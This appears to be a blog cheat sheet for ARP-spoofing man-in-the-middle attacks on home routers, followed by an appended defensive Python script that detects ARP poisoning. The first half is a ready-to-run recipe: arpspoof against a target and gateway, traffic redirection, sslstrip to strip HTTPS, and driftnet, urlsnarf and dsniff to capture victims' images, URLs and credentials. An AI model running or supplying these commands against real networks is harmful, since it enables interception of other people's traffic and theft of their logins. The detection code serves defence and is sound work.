ARP Spoofing to Obtain Device Information

Man-in-the-middle attack and data acquisition on home routers.

Introduction to ARP Process

Linux

# Enable IP forwarding so intercepted traffic is still relayed
echo 1 >/proc/sys/net/ipv4/ip_forward
# Monitor images
driftnet -i eth0 -d ~/Desktop/pic -a
driftnet -i eth0
# Monitor URLs
urlsnarf -i eth0
# Redirect port 80 traffic to the local listener through iptables
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

# Spoof target machine
arpspoof -i eth0 -t 192.168.2.165 192.168.2.1
# Spoof gateway
arpspoof -i eth0 -t 192.168.2.1 192.168.2.150

# -c chooses the MAC used when restoring ARP entries on exit (own|host|both)
arpspoof -i eth0 -c own -t 192.168.2.213 192.168.2.1

# Intercept data (listen on the port the iptables rule redirects to)
sslstrip -l <yourListenPort>
# Start packet capture tool
wireshark

Mac

# Create /etc/pf.anchors/http with the redirect rule (port 80 -> local listener on 8080)
rdr pass on en0 proto tcp from any to any port 80 -> 127.0.0.1 port 8080

# Modify /etc/pf.conf, adding the following lines at the appropriate location
rdr-anchor "http-forwarding"
load anchor "http-forwarding" from "/etc/pf.anchors/http"

# Restart the packet filter
sudo pfctl -ef /etc/pf.conf
sudo pfctl -E

# Start the listener on the redirected port
sslstrip -l 8080

# Enable forwarding
sudo sysctl -w net.inet.ip.forwarding=1
# Check forwarding status
sudo sysctl -a | grep forward

# arpspoof -i en0 -t (target IP) (gateway IP)
# Spoof target machine
arpspoof -i en0 -t 10.196.17.58 10.196.17.1
# Spoof gateway
arpspoof -i en0 -t 10.196.17.1 10.196.17.24

# Capture traffic
sudo ettercap -G
# Select target1

# Sniff forwarded traffic with dsniff
dsniff -i eth0

Filter

# Wireshark display filter: HTTP traffic from the spoofed host
ip.src==192.168.2.213 and http
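The arpspoof commands above work by making the target and the gateway each learn the attacker's MAC for the other's IP; for a defender the same poisoning is visible on the wire as an IP-to-MAC binding that flips and as one MAC announcing several IPs, which is what tools such as arpwatch report. Added example, not part of the original notes: a minimal Python ARP monitor that parses raw Ethernet/ARP frames and alerts on those two symptoms; the MACs, IPs and frames are constructed sample input.

```python
import struct
from collections import defaultdict

ETH = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
ARP = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP, ARP_REPLY = 0x0806, 2

def parse_arp(frame):  # -> (op, sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None
    if len(frame) < ETH.size + ARP.size or ETH.unpack_from(frame)[2] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, _, _ = ARP.unpack_from(frame, ETH.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, ":".join(f"{x:02x}" for x in sha), ".".join(str(x) for x in spa)

class ArpWatch:
    def __init__(self, gateway_ip):
        self.gateway_ip = gateway_ip
        self.first_mac = {}                 # ip -> MAC that first announced it (kept on conflict)
        self.ips_by_mac = defaultdict(set)  # mac -> every IP it has announced

    def observe(self, frame):  # feed one frame; returns alert strings, [] if nothing suspicious
        parsed = parse_arp(frame)
        if parsed is None:
            return []
        _, mac, ip = parsed                 # requests and replies both carry a sender binding
        alerts = []
        known = self.first_mac.setdefault(ip, mac)
        if known != mac:                    # binding flipped: the classic poisoning symptom
            level = "CRITICAL" if ip == self.gateway_ip else "WARNING"
            alerts.append(f"{level}: {ip} moved from {known} to {mac}")
        self.ips_by_mac[mac].add(ip)
        others = sorted(self.ips_by_mac[mac] - {ip})
        if others:                          # one MAC speaking for several IPs (can be benign aliasing)
            alerts.append(f"NOTICE: {mac} also claims {', '.join(others)}")
        return alerts

def make_frame(op, sha, spa, tha, tpa):  # builds a constructed ARP frame, used only as sample input
    sha_b, tha_b = (bytes.fromhex(m.replace(":", "")) for m in (sha, tha))
    spa_b, tpa_b = (bytes(int(o) for o in a.split(".")) for a in (spa, tpa))
    return ETH.pack(tha_b, sha_b, ETHERTYPE_ARP) + ARP.pack(1, 0x0800, 6, 4, op, sha_b, spa_b, tha_b, tpa_b)

def demo():  # constructed scenario: two genuine replies, then a third MAC announcing both IPs
    gw, host, third = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:02", "cc:cc:cc:cc:cc:03"
    watch = ArpWatch("192.168.2.1")
    frames = [make_frame(ARP_REPLY, gw, "192.168.2.1", host, "192.168.2.165"),
              make_frame(ARP_REPLY, host, "192.168.2.165", gw, "192.168.2.1"),
              make_frame(ARP_REPLY, third, "192.168.2.1", host, "192.168.2.165"),
              make_frame(ARP_REPLY, third, "192.168.2.165", gw, "192.168.2.1")]
    return [alert for frame in frames for alert in watch.observe(frame)]
```

On a real host the frames would come from a raw socket or a pcap reader on the listening interface; the parsing and alert logic stay the same.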

Please indicate the source when reprinting. This article is licensed under the CC4.0 license.